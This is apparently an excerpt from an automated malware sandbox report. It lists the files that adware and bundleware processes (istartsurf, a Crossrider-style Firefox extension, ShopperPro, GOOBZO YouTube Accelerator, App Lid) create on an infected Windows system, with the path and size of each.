C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\QQBrowserFrame.dll (110 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)

The process testlsp.exe:4312 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\helper_4312_testlsp.log (151 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_4312_testlsp.log (120774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\SMALLTEST[1].htm (70 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\ipc_4312_testlsp.log (1453 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\testlsp_4312.log (1362 bytes)

The process 01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe:4404 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\fcd1e3efcc56376494881a5840f44668.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\75993412f37946fca43501df135b9101.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\ed25e4865e773eba7e25f1996c5a4bce.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\defaults\preferences\prefs.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\27b108c0cebbe4aab1ad8c391e83b331.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon24.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\e055ba096a4270f84e5bdb65a438e474.js (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\9136010c804a2840f7d7c27e5d1afcd7.js (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\c74ac2e4f6f4f31cc4cb7288d9c2f772.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\252.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\9431c4a640636e5a4800c356296cd644.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5f3def1ffe21b50407f4186bf271625a.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d6ec1dab117f4ac2f2f5d541daed79e2.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\2e0fa692e5e7d961bb9d81cfa1ac2966.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\255.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\6c7811f10cfb98b9f1763b5345d85e98.js (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\670dbbe403c6360b6052e5f363ed450b.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\98334486106663b4a30c7033eca32d66.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\438b972f6294cdfbae9eca34e441ad3e.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome.manifest (634 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\345.js (663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\391.js (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\install.rdf (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\376.js (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d274b38a69a3c51f8a7bff7fc4721094.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\2141b52706ef745b2a22e75e33895245.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\extension.js (358 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\manifest.xml (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\33b7793cc2e4404931497edf64c26ed3.js (947 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\9941ee745cddfe1005b7e7089b614a4b.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button2.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button3.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\01582ac40322b6d7683825c62a0263ad.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\375.js (685 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\339.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\234.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\288.js (969 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button4.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dda43c892e467b84c5c5a65c0f78f43a.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\281.js (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\83f6d845993575c3d94fcc78e4f7ef92.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a23949c9b6c9e24ee54e99e4f08ebb4f.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\skin.css (909 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon48.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\b445e40fee926becbc6a7fa6a5bf3e58.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\c12defd337be815c0c356e8185da5647.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\379.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\29f86db80793dfda37ea151f81b1eb0a.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\242.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\6889d563da5c48a8ce768e0edc93745a.js (618 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\12870b8beedc10c7c2e7042a752c1a96.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d3a5f2653762702a2d5ebd74ef211e17.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button1.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1cd092e31d00a3d88980638b1aacad86.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\1cfe04157632e78d46fbd4494cd08061.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\5febde0bacdab7a8f3ec6ce44e0b706b.js (964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7500741a9065ecf69dfd112421772ba4.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\385.js (805 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon128.png (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\d558fdbf24bb49e9fd8ea5834f2d8296.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\popup.html (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon16.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\28.js (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dialog.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.xul (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\be027ac44fbc92bdd651ab8bc10b05b3.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\bedd2ff3c8cd163718841dffba2e2bef.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins.json (24 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\b2d1b826ecaf80956e7bcf1153760d27.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\62284fa1d9293d5cff57e6447dac23c8.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\update.css (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\390.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\221.js (419 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\2c336850160e00c5eb623004e5ec3aca.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\background.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\background.js (640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\4a3c378be3c0a1c88251e33fb294c23b.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\browser.xul (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\acbac258ab8930f55df2737a7623316e.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d4ed991ff40a229a0622e0606a37327b.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\246.js (15 bytes)

The process powershell.exe:3812 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\512TH2I56RW92FW4HP5L.temp (196 bytes)

The process powershell.exe:2532 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MOBWFZ73Q1QKEOQLZEYR.temp (196 bytes)

The process powershell.exe:3740 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MK8J0L7EHIHKKHBV3N6.temp (196 bytes)

The process setup.exe:1832 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files%\Common Files\ShopperPro\spbii64.exe (17848 bytes)
%Program Files%\Common Files\ShopperPro\spbia.exe (11344 bytes)
%Program Files% (x86)\ShopperPro\ShopperPro.exe (33633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\MoreInfo.dll (15 bytes)
%Program Files%\Common Files\ShopperPro\spbiw.sys (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95F9.tmp (360165 bytes)
%Program Files%\Common Files\ShopperPro\spbii32.exe (13368 bytes)
%Program Files% (x86)\ShopperPro\Updater.exe (25112 bytes)
%Program Files%\Common Files\ShopperPro\spbiu.exe (69777 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\jsdrv.exe (100669 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\AccDownload.dll (11659 bytes)
%Program Files% (x86)\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files% (x86)\ShopperPro\FireFox\content\overlay.xul (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\ShopperPro\spbici32.dll (37025 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\jsdrv.sys (1856 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files% (x86)\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files% (x86)\ShopperPro\ShopperPro.dll (15168 bytes)
C:\Users\Public\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\nsProcess.dll (12 bytes)
%Program Files% (x86)\ShopperPro\FireFox\install.rdf (828 bytes)
%Program Files%\Common Files\ShopperPro\spbici64.dll (48241 bytes)
%Program Files% (x86)\ShopperPro\database1_0_0.json (11 bytes)
%Program Files% (x86)\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files% (x86)\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files% (x86)\ShopperPro\database1_0_0.ej (14 bytes)
%Program Files% (x86)\ShopperPro\manifest.json (595 bytes)
%Program Files% (x86)\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)

The process HPNotify.exe:4640 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\conf (1480 bytes)

The process GLJ625B.tmp:3268 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Windows\SysWOW64\AniGIF.ocx (172 bytes)

The process Bxaze.exe:1776 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\uxdfkxs.dll (8 bytes)
C:\Windows\Tasks\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5_user.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp (4 bytes)
%Program Files% (x86)\App Lid\utils.exe (76402 bytes)
C:\Windows\Tasks\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\System.dll (808 bytes)
%Program Files% (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505.xpi (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\151655 (4095 bytes)
